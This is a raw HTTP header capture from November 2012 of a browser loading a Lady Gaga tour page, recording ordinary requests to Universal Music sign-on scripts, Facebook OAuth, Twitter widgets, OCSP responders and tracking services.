Content-Length: 75
Content-Type: application/x-javascript; charset=&quot;utf-8&quot;
Access-Control-Allow-Origin: *
X-Echo-Node: jskit@nweb24
GET /scripts/capture.js?host=http%3A%2F%2Fwww.ladygaga.com&clientId=9etp92vwb5b6rkyhc3zana8fk54k7nqv&bundle=CrOlwx%2bTAhN6Ip%2bS8MfO7Ie0MMj45MGKonhiugcGfE5EZo7lvSJluZ7ikFzyd3IqM9omoWorzggEpY71dRjW9PnoTTMmZsBijX%2f%2fxpu%2bGdOH%2b8v6y84EwdY2F%2frzLHBzsPqCwyU15%2b24VylPYeWYj%2b%2fohSMT9BeTif7RpjRhN%2fTUDKOjSin%2bMc80hjSFtEQoPGp4eDG75BI2xduY52%2fXbTq%2buT0Z4RHpBcqsJWnfPo%2bS1Xu1u2NovCR5VffczODO&thinRegistration=true HTTP/1.1

Host: reg.sso.universalmusic.com
GET /scripts/capture.js?host=http%3A%2F%2Fwww.ladygaga.com&amp;clientId=9etp92vwb5b6rkyhc3zana8fk54k7nqv&amp;bundle=CrOlwx%2bTAhN6Ip%2bS8MfO7Ie0MMj45MGKonhiugcGfE5EZo7lvSJluZ7ikFzyd3IqM9omoWorzggEpY71dRjW9PnoTTMmZsBijX%2f%2fxpu%2bGdOH%2b8v6y84EwdY2F%2frzLHBzsPqCwyU15%2b24VylPYeWYj%2b%2fohSMT9BeTif7RpjRhN%2fTUDKOjSin%2bMc80hjSFtEQoPGp4eDG75BI2xduY52%2fXbTq%2buT0Z4RHpBcqsJWnfPo%2bS1Xu1u2NovCR5VffczODO&amp;thinRegistration=true HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: text/javascript; charset=utf-8
Server: nginx
Date: Tue, 06 Nov 2012 16:44:39 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=60
Vary: Accept-Encoding, *
Cache-Control: public, max-age=5
Expires: Tue, 06 Nov 2012 16:46:14 GMT
Last-Modified: Tue, 06 Nov 2012 16:45:44 GMT
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Encoding: gzip
GET /favicon.ico HTTP/1.1

Host: www.ladygaga.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
Cookie: VisitorTracking=a=1fdb16e9-dc6e-435b-94cc-3de3a8806488&amp;b=11%2f6%2f2012+11%3a44%3a21+AM; backplane-channel=umg:ef3ea8615131b4becdaecc1f35fa1870; __utma=70702477.2091381384.1352220267.1352220267.1352220267.1; __utmb=70702477.4.10.1352220267; __utmc=70702477; __utmz=70702477.1352220267.1.1.utmcsr=linaconstruction.net|utmccn=(referral)|utmcmd=referral|utmcct=/index.php
HTTP/1.1 200 OK

Content-Type: image/x-icon
Last-Modified: Tue, 31 May 2011 04:21:44 GMT
Accept-Ranges: bytes
Etag: &quot;f1b6e13f4a1fcc1:0&quot;
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 894
Date: Tue, 06 Nov 2012 16:44:40 GMT
Connection: keep-alive
GET /s2/oz/images/stars/po/Publisher/sprite4-a67f741843ffc4220554c34bd01bb0bb.png HTTP/1.1

Host: ssl.gstatic.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: image/png
Last-Modified: Thu, 13 Sep 2012 21:47:55 GMT
Date: Thu, 01 Nov 2012 01:08:52 GMT
Expires: Fri, 01 Nov 2013 01:08:52 GMT
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 21399
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=31536000
Age: 488148
GET /js/tfw/widget/hubclient.js HTTP/1.1

Host: platform.twitter.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/javascript; charset=utf-8
Last-Modified: Fri, 02 Nov 2012 09:35:33 GMT
Etag: &quot;1411999884f419ea8219bf9b531a9c66&quot;
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 3260
Date: Tue, 06 Nov 2012 16:44:41 GMT
Connection: keep-alive
P3P: CP=&quot;CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT&quot;
GET /widgets/hub.html HTTP/1.1

Host: platform.twitter.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=1800
Last-Modified: Fri, 02 Nov 2012 09:48:13 GMT
Etag: &quot;b036a791811effc968bfcb43fa6d6910&quot;
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 7242
Date: Tue, 06 Nov 2012 16:44:41 GMT
Connection: keep-alive
P3P: CP=&quot;CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT&quot;
GET /v1/users/whoami?callback=jQuery16204316683890311467_1352220262707&appkey=prod.umg&sessionID=https%3A%2F%2Fbackplane1.janrainbackplane.com%2Fv1.2%2Fbus%2Fumg%2Fchannel%2F9e8fe77317ad52cfad5f66aef970fe5c&_=1352220281480 HTTP/1.1

Host: api.echoenabled.com
GET /v1/users/whoami?callback=jQuery16204316683890311467_1352220262707&amp;appkey=prod.umg&amp;sessionID=https%3A%2F%2Fbackplane1.janrainbackplane.com%2Fv1.2%2Fbus%2Fumg%2Fchannel%2F9e8fe77317ad52cfad5f66aef970fe5c&amp;_=1352220281480 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript; charset="utf-8"
Connection: close
Server: Yaws 1.92
Date: Tue, 06 Nov 2012 16:44:41 GMT
Content-Length: 75
Content-Type: application/x-javascript; charset=&quot;utf-8&quot;
Access-Control-Allow-Origin: *
X-Echo-Node: jskit@nweb48
GET /v1/users/whoami?callback=jQuery16208557557391869324_1352220262759&appkey=prod.umg&sessionID=https%3A%2F%2Fbackplane1.janrainbackplane.com%2Fv1.2%2Fbus%2Fumg%2Fchannel%2Fef3ea8615131b4becdaecc1f35fa1870&_=1352220281566 HTTP/1.1

Host: api.echoenabled.com
GET /v1/users/whoami?callback=jQuery16208557557391869324_1352220262759&amp;appkey=prod.umg&amp;sessionID=https%3A%2F%2Fbackplane1.janrainbackplane.com%2Fv1.2%2Fbus%2Fumg%2Fchannel%2Fef3ea8615131b4becdaecc1f35fa1870&amp;_=1352220281566 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript; charset="utf-8"
Connection: close
Server: Yaws 1.92
Date: Tue, 06 Nov 2012 16:44:41 GMT
Content-Length: 75
Content-Type: application/x-javascript; charset=&quot;utf-8&quot;
Access-Control-Allow-Origin: *
X-Echo-Node: jskit@nweb38
POST / HTTP/1.1

Host: ocsp.verisign.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 115
Content-Type: application/ocsp-request
HTTP/1.0 200 Ok

Content-Type: application/ocsp-response
Last-Modified: Tue, 06 Nov 2012 00:37:37 GMT
Expires: Tue, 13 Nov 2012 00:37:37 GMT
Content-Transfer-Encoding: binary
Content-Length: 1814
Cache-Control: max-age=546776, public, no-transform, must-revalidate
Date: Tue, 06 Nov 2012 16:44:41 GMT
nncoection: close
Connection: Keep-Alive
POST / HTTP/1.1

Host: ocsp.usertrust.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 115
Content-Type: application/ocsp-request
HTTP/1.1 200 OK

Content-Type: application/ocsp-response
Date: Tue, 06 Nov 2012 16:44:42 GMT
Server: Apache
Last-Modified: Tue, 06 Nov 2012 06:36:11 GMT
Expires: Sat, 10 Nov 2012 06:36:11 GMT
Etag: 4E3F00C75DFA79F2797CEE22BD39C5A9CBC0804A
Cache-Control: max-age=308488,public,no-transform,must-revalidate
X-OCSP-Reponder-ID: h6edcaocsp8
Content-Length: 471
Connection: close
GET /v1/users/whoami?callback=jQuery162023256087819482452_1352220263375&appkey=prod.umg&sessionID=https%3A%2F%2Fbackplane1.janrainbackplane.com%2Fv1.2%2Fbus%2Fumg%2Fchannel%2F9e8fe77317ad52cfad5f66aef970fe5c&_=1352220281741 HTTP/1.1

Host: api.echoenabled.com
GET /v1/users/whoami?callback=jQuery162023256087819482452_1352220263375&amp;appkey=prod.umg&amp;sessionID=https%3A%2F%2Fbackplane1.janrainbackplane.com%2Fv1.2%2Fbus%2Fumg%2Fchannel%2F9e8fe77317ad52cfad5f66aef970fe5c&amp;_=1352220281741 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript; charset="utf-8"
Connection: close
Server: Yaws 1.92
Date: Tue, 06 Nov 2012 16:44:42 GMT
Content-Length: 76
Content-Type: application/x-javascript; charset=&quot;utf-8&quot;
Access-Control-Allow-Origin: *
X-Echo-Node: jskit@nweb49
GET /scripts/capture.js?host=http%3A%2F%2Fwww.ladygaga.com&clientId=9etp92vwb5b6rkyhc3zana8fk54k7nqv&bundle=CrOlwx%2bTAhN6Ip%2bS8MfO7Ie0MMj45MGKonhiugcGfE5EZo7lvSJluZ7ikFzyd3IqM9omoWorzggEpY71dRjW9PnoTTMmZsBijX%2f%2fxpu%2bGdOH%2b8v6y84EwdY2F%2frzLHBzsPqCwyU15%2b24VylPYeWYj%2b%2fohSMT9BeTif7RpjRhN%2fTUDKOjSin%2bMc80hjSFtEQoPGp4eDG75BI2xduY52%2fXbTq%2buT0Z4RHpBcqsJWnfPo%2bS1Xu1u2NovCR5VffczODO&thinRegistration=true HTTP/1.1

Host: reg.sso.universalmusic.com
GET /scripts/capture.js?host=http%3A%2F%2Fwww.ladygaga.com&amp;clientId=9etp92vwb5b6rkyhc3zana8fk54k7nqv&amp;bundle=CrOlwx%2bTAhN6Ip%2bS8MfO7Ie0MMj45MGKonhiugcGfE5EZo7lvSJluZ7ikFzyd3IqM9omoWorzggEpY71dRjW9PnoTTMmZsBijX%2f%2fxpu%2bGdOH%2b8v6y84EwdY2F%2frzLHBzsPqCwyU15%2b24VylPYeWYj%2b%2fohSMT9BeTif7RpjRhN%2fTUDKOjSin%2bMc80hjSFtEQoPGp4eDG75BI2xduY52%2fXbTq%2buT0Z4RHpBcqsJWnfPo%2bS1Xu1u2NovCR5VffczODO&amp;thinRegistration=true HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: text/javascript; charset=utf-8
Server: nginx
Date: Tue, 06 Nov 2012 16:44:41 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=60
Vary: Accept-Encoding, *
Cache-Control: public, max-age=6
Expires: Tue, 06 Nov 2012 16:46:17 GMT
Last-Modified: Tue, 06 Nov 2012 16:45:47 GMT
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Encoding: gzip
POST / HTTP/1.1

Host: ocsp.entrust.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 103
Content-Type: application/ocsp-request
HTTP/1.0 200 OK

Content-Type: application/ocsp-response
Content-Transfer-Encoding: Binary
Content-Length: 1938
Connection: Close
GET /widgets/hub.html HTTP/1.1

Host: platform.twitter.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=1800
Last-Modified: Fri, 02 Nov 2012 09:48:13 GMT
Etag: &quot;b036a791811effc968bfcb43fa6d6910&quot;
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 7242
Date: Tue, 06 Nov 2012 16:44:42 GMT
Connection: keep-alive
P3P: CP=&quot;CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT&quot;
GET /scripts/capture.js?host=http%3A%2F%2Fwww.ladygaga.com&clientId=9etp92vwb5b6rkyhc3zana8fk54k7nqv&bundle=CrOlwx%2bTAhN6Ip%2bS8MfO7Ie0MMj45MGKonhiugcGfE5EZo7lvSJluZ7ikFzyd3IqM9omoWorzggEpY71dRjW9PnoTTMmZsBijX%2f%2fxpu%2bGdOH%2b8v6y84EwdY2F%2frzLHBzsPqCwyU15%2b24VylPYeWYj%2b%2fohSMT9BeTif7RpjRhN%2fTUDKOjSin%2bMc80hjSFtEQoPGp4eDG75BI2xduY52%2fXbTq%2buT0Z4RHpBcqsJWnfPo%2bS1Xu1u2NovCR5VffczODO&thinRegistration=true HTTP/1.1

Host: reg.sso.universalmusic.com
GET /scripts/capture.js?host=http%3A%2F%2Fwww.ladygaga.com&amp;clientId=9etp92vwb5b6rkyhc3zana8fk54k7nqv&amp;bundle=CrOlwx%2bTAhN6Ip%2bS8MfO7Ie0MMj45MGKonhiugcGfE5EZo7lvSJluZ7ikFzyd3IqM9omoWorzggEpY71dRjW9PnoTTMmZsBijX%2f%2fxpu%2bGdOH%2b8v6y84EwdY2F%2frzLHBzsPqCwyU15%2b24VylPYeWYj%2b%2fohSMT9BeTif7RpjRhN%2fTUDKOjSin%2bMc80hjSFtEQoPGp4eDG75BI2xduY52%2fXbTq%2buT0Z4RHpBcqsJWnfPo%2bS1Xu1u2NovCR5VffczODO&amp;thinRegistration=true HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: text/javascript; charset=utf-8
Server: nginx
Date: Tue, 06 Nov 2012 16:44:42 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=60
Vary: Accept-Encoding, *
Cache-Control: public, max-age=9
Expires: Tue, 06 Nov 2012 16:46:20 GMT
Last-Modified: Tue, 06 Nov 2012 16:45:50 GMT
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Encoding: gzip
GET /dialog/oauth?client_id=34617625687&response_type=token%2Csigned_request%2Ccode&display=none&domain=www.ladygaga.com&origin=1&redirect_uri=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D14%23cb%3Df23c9a572ace102%26origin%3Dhttp%253A%252F%252Fwww.ladygaga.com%252Ff218f4d76476d48%26domain%3Dwww.ladygaga.com%26relation%3Dparent&sdk=joey HTTP/1.1

Host: www.facebook.com
GET /dialog/oauth?client_id=34617625687&amp;response_type=token%2Csigned_request%2Ccode&amp;display=none&amp;domain=www.ladygaga.com&amp;origin=1&amp;redirect_uri=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D14%23cb%3Df23c9a572ace102%26origin%3Dhttp%253A%252F%252Fwww.ladygaga.com%252Ff218f4d76476d48%26domain%3Dwww.ladygaga.com%26relation%3Dparent&amp;sdk=joey HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Content-Encoding: gzip
X-FB-Debug: 7I152iHuDnvKLCAeoMoH513X3o3W4OeMWGYxPe8Byfk=
Date: Tue, 06 Nov 2012 16:44:42 GMT
Transfer-Encoding: chunked
Connection: keep-alive
GET /dialog/oauth?client_id=34617625687&response_type=token%2Csigned_request%2Ccode&display=none&domain=www.ladygaga.com&origin=1&redirect_uri=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D14%23cb%3Df2764f164e9ea82%26origin%3Dhttp%253A%252F%252Fwww.ladygaga.com%252Ff3408da8c395eea%26domain%3Dwww.ladygaga.com%26relation%3Dparent&sdk=joey HTTP/1.1

Host: www.facebook.com
GET /dialog/oauth?client_id=34617625687&amp;response_type=token%2Csigned_request%2Ccode&amp;display=none&amp;domain=www.ladygaga.com&amp;origin=1&amp;redirect_uri=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D14%23cb%3Df2764f164e9ea82%26origin%3Dhttp%253A%252F%252Fwww.ladygaga.com%252Ff3408da8c395eea%26domain%3Dwww.ladygaga.com%26relation%3Dparent&amp;sdk=joey HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Content-Encoding: gzip
X-FB-Debug: +0NPxU0zxUKPmA+SBCDAp2Z3oLmDUnkxKqg3OS+L3z8=
Date: Tue, 06 Nov 2012 16:44:29 GMT
Transfer-Encoding: chunked
Connection: keep-alive
GET /scripts/capture.js?host=http%3A%2F%2Fwww.ladygaga.com&clientId=9etp92vwb5b6rkyhc3zana8fk54k7nqv&bundle=CrOlwx%2bTAhN6Ip%2bS8MfO7Ie0MMj45MGKonhiugcGfE5EZo7lvSJluZ7ikFzyd3IqM9omoWorzggEpY71dRjW9PnoTTMmZsBijX%2f%2fxpu%2bGdOH%2b8v6y84EwdY2F%2frzLHBzsPqCwyU15%2b24VylPYeWYj%2b%2fohSMT9BeTif7RpjRhN%2fTUDKOjSin%2bMc80hjSFtEQoPGp4eDG75BI2xduY52%2fXbTq%2buT0Z4RHpBcqsJWnfPo%2bS1Xu1u2NovCR5VffczODO&thinRegistration=true HTTP/1.1

Host: reg.sso.universalmusic.com
GET /scripts/capture.js?host=http%3A%2F%2Fwww.ladygaga.com&amp;clientId=9etp92vwb5b6rkyhc3zana8fk54k7nqv&amp;bundle=CrOlwx%2bTAhN6Ip%2bS8MfO7Ie0MMj45MGKonhiugcGfE5EZo7lvSJluZ7ikFzyd3IqM9omoWorzggEpY71dRjW9PnoTTMmZsBijX%2f%2fxpu%2bGdOH%2b8v6y84EwdY2F%2frzLHBzsPqCwyU15%2b24VylPYeWYj%2b%2fohSMT9BeTif7RpjRhN%2fTUDKOjSin%2bMc80hjSFtEQoPGp4eDG75BI2xduY52%2fXbTq%2buT0Z4RHpBcqsJWnfPo%2bS1Xu1u2NovCR5VffczODO&amp;thinRegistration=true HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: text/javascript; charset=utf-8
Server: nginx
Date: Tue, 06 Nov 2012 16:44:42 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=60
Vary: Accept-Encoding, *
Cache-Control: public, max-age=5
Expires: Tue, 06 Nov 2012 16:46:17 GMT
Last-Modified: Tue, 06 Nov 2012 16:45:47 GMT
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Encoding: gzip
GET /dialog/oauth?client_id=34617625687&response_type=token%2Csigned_request%2Ccode&display=none&domain=www.ladygaga.com&origin=1&redirect_uri=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D14%23cb%3Df2f20b28910d6e%26origin%3Dhttp%253A%252F%252Fwww.ladygaga.com%252Ff2942d0c5b15e68%26domain%3Dwww.ladygaga.com%26relation%3Dparent&sdk=joey HTTP/1.1

Host: www.facebook.com
GET /dialog/oauth?client_id=34617625687&amp;response_type=token%2Csigned_request%2Ccode&amp;display=none&amp;domain=www.ladygaga.com&amp;origin=1&amp;redirect_uri=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D14%23cb%3Df2f20b28910d6e%26origin%3Dhttp%253A%252F%252Fwww.ladygaga.com%252Ff2942d0c5b15e68%26domain%3Dwww.ladygaga.com%26relation%3Dparent&amp;sdk=joey HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Content-Encoding: gzip
X-FB-Debug: X3lQbSYgkVyZF2w3sWr9OZXrhx27zYM3Kc2tkOWyZCE=
Date: Tue, 06 Nov 2012 16:44:42 GMT
Transfer-Encoding: chunked
Connection: keep-alive
GET /5/c=938/rand=924994231/pv=y/rt=ifr HTTP/1.1

Host: bcp.crwdcntrl.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 302 Found

Content-Type: text/plain; charset=UTF-8
Date: Tue, 06 Nov 2012 16:44:42 GMT
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
X-Server: 172.25.10.10
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: http://bcp.crwdcntrl.net/5/ct=y/c=938/rand=924994231/pv=y/rt=ifr
Set-Cookie: cc=ctst;Path=/;Domain=.crwdcntrl.net
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 20
GET /5/c=938/rand=202036522/pv=y/rt=ifr HTTP/1.1

Host: bcp.crwdcntrl.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 302 Found

Content-Type: text/plain; charset=UTF-8
Date: Tue, 06 Nov 2012 16:44:43 GMT
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
X-Server: 172.25.11.107
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: http://bcp.crwdcntrl.net/5/ct=y/c=938/rand=202036522/pv=y/rt=ifr
Set-Cookie: cc=ctst;Path=/;Domain=.crwdcntrl.net
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 20
GET /translate_static/js/element/hrs.swf HTTP/1.1

Host: translate.googleapis.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-shockwave-flash
Last-Modified: Mon, 02 Apr 2012 00:13:23 GMT
